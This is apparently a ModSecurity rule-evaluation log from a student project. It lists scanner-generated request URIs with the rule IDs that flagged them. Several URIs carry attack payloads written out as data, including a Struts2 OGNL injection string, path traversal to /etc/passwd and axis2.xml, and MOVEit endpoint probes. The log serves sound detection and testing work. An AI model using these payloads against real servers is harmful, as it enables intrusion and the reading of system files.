# ms-inspectorlog v3.5
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/dit/Downloads/inspectorlog/ms-inspectorlog -l watobo.short -t list -r /home/dit/Downloads/inspectorlog/etc/basic_rules.conf -o /home/dit/TFG/ficheros_uris_completos/web_estatica/modsecurity/watobo_short.clean
Packet [91]	Uri [/.query.json?statement=%2F%2F%2A]	Nattacks [1 ]	Signatures	[942440]
Packet [111]	Uri [/?action%3Awatobo_%25%7B10000-1%7D]	Nattacks [2 ]	Signatures	[920220]	[920272]
Packet [112]	Uri [/?redirect%3Awatobo_%25%7B10000-1%7D]	Nattacks [2 ]	Signatures	[920220]	[920272]
Packet [113]	Uri [/?redirectAction%3Awatobo_%25%7B10000-1%7D]	Nattacks [2 ]	Signatures	[920220]	[920272]
Packet [966]	Uri [/elmah.axd]	Nattacks [1 ]	Signatures	[920440]
Packet [2029]	Uri [/MOVEitISAPI/MOVEitISAPI.dll?action=capa]	Nattacks [1 ]	Signatures	[920440]
Packet [2030]	Uri [/moveitisapi/moveitisapi.dll?action=download]	Nattacks [1 ]	Signatures	[920440]
Packet [2518]	Uri [/Trace.axd]	Nattacks [1 ]	Signatures	[920440]
Packet [2613]	Uri [/web.query.json?statement=%2F%2F%2A]	Nattacks [1 ]	Signatures	[942440]
Packet [2633]	Uri [/web?watobo=%25%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29%28%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%29%28%23writer%3D%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2C%23writer.println%28%27INJ%27%2B%271645209911%27%29%2C%23writer.close%28%29%29%7D]	Nattacks [13 ]	Signatures	[920220]	[920272]	[941340]	[942200]	[942260]	[942370]	[942430]	[942440]	[942490]	[942431]	[942460]	[942511]	[944130]
Packet [2637]	Uri [/web?xsd=../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [2638]	Uri [/web?xsd=../conf/axis2.xml]	Nattacks [1 ]	Signatures	[930110]
# N. packets [2771], [12] with alerts, N. Alerts [32]
